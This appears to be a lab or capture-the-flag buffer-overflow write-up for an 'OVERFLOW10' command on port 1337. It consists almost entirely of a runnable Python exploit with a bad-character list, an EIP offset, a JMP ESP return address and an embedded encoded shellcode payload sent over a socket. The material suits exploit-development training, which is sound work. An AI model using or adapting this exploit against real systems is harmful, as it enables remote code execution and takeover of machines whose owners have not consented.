Example payload scripts

Badchars: \x00\xa0\xad\xbe\xde\xef

Exploit code

#!/usr/bin/env python3
import socket


ip = "MACHINE_IP"
port = 1337

buf_length = 1000
prefix = "OVERFLOW10 "
offset = 537                            # EIP offset
overflow = "A" * offset
jmp_esp = "\x05\x12\x50\x62"

buffer = ""
buffer += prefix
buffer += overflow                      # Padding
buffer += jmp_esp                       # Overwrite saved return pointer
buffer += "\x83\xec\x10"                # NOP sled
buffer += ("\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
	"\x11\xab\x0e\x07\x83\xee\xfc\xe2\xf4\xed\x43\x8c\x07\x11\xab"
	"\x6e\x8e\xf4\x9a\xce\x63\x9a\xfb\x3e\x8c\x43\xa7\x85\x55\x05"
	"\x20\x7c\x2f\x1e\x1c\x44\x21\x20\x54\xa2\x3b\x70\xd7\x0c\x2b"
	"\x31\x6a\xc1\x0a\x10\x6c\xec\xf5\x43\xfc\x85\x55\x01\x20\x44"
	"\x3b\x9a\xe7\x1f\x7f\xf2\xe3\x0f\xd6\x40\x20\x57\x27\x10\x78"
	"\x85\x4e\x09\x48\x34\x4e\x9a\x9f\x85\x06\xc7\x9a\xf1\xab\xd0"
	"\x64\x03\x06\xd6\x93\xee\x72\xe7\xa8\x73\xff\x2a\xd6\x2a\x72"
	"\xf5\xf3\x85\x5f\x35\xaa\xdd\x61\x9a\xa7\x45\x8c\x49\xb7\x0f"
	"\xd4\x9a\xaf\x85\x06\xc1\x22\x4a\x23\x35\xf0\x55\x66\x48\xf1"
	"\x5f\xf8\xf1\xf4\x51\x5d\x9a\xb9\xe5\x8a\x4c\xc3\x3d\x35\x11"
	"\xab\x66\x70\x62\x99\x51\x53\x79\xe7\x79\x21\x16\x54\xdb\xbf"
	"\x81\xaa\x0e\x07\x38\x6f\x5a\x57\x79\x82\x8e\x6c\x11\x54\xdb"
	"\x57\x41\xfb\x5e\x47\x41\xeb\x5e\x6f\xfb\xa4\xd1\xe7\xee\x7e"
	"\x99\x6d\x14\xc3\xce\xaf\x61\x2b\x66\x05\x11\xaa\xb5\x8e\xf7"
	"\xc1\x1e\x51\x46\xc3\x97\xa2\x65\xca\xf1\xd2\x94\x6b\x7a\x0b"
	"\xee\xe5\x06\x72\xfd\xc3\xfe\xb2\xb3\xfd\xf1\xd2\x79\xc8\x63"
	"\x63\x11\x22\xed\x50\x46\xfc\x3f\xf1\x7b\xb9\x57\x51\xf3\x56"
	"\x68\xc0\x55\x8f\x32\x06\x10\x26\x4a\x23\x01\x6d\x0e\x43\x45"
	"\xfb\x58\x51\x47\xed\x58\x49\x47\xfd\x5d\x51\x79\xd2\xc2\x38"
	"\x97\x54\xdb\x8e\xf1\xe5\x58\x41\xee\x9b\x66\x0f\x96\xb6\x6e"
	"\xf8\xc4\x10\xee\x1a\x3b\xa1\x66\xa1\x84\x16\x93\xf8\xc4\x97"
	"\x08\x7b\x1b\x2b\xf5\xe7\x64\xae\xb5\x40\x02\xd9\x61\x6d\x11"
	"\xf8\xf1\xd2")
buffer += "D" * (buf_length - (len(buffer) - len(prefix)))      # Trail padding
buffer += "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("[+] Sending evil buffer of {} bytes...".format((len(buffer) - len(prefix) - 2)))
    s.send(bytes(buffer, "latin-1"))
    print("[+] Done!")
except socket.error:
    print("[-] Could not connect.")
finally:
    s.close()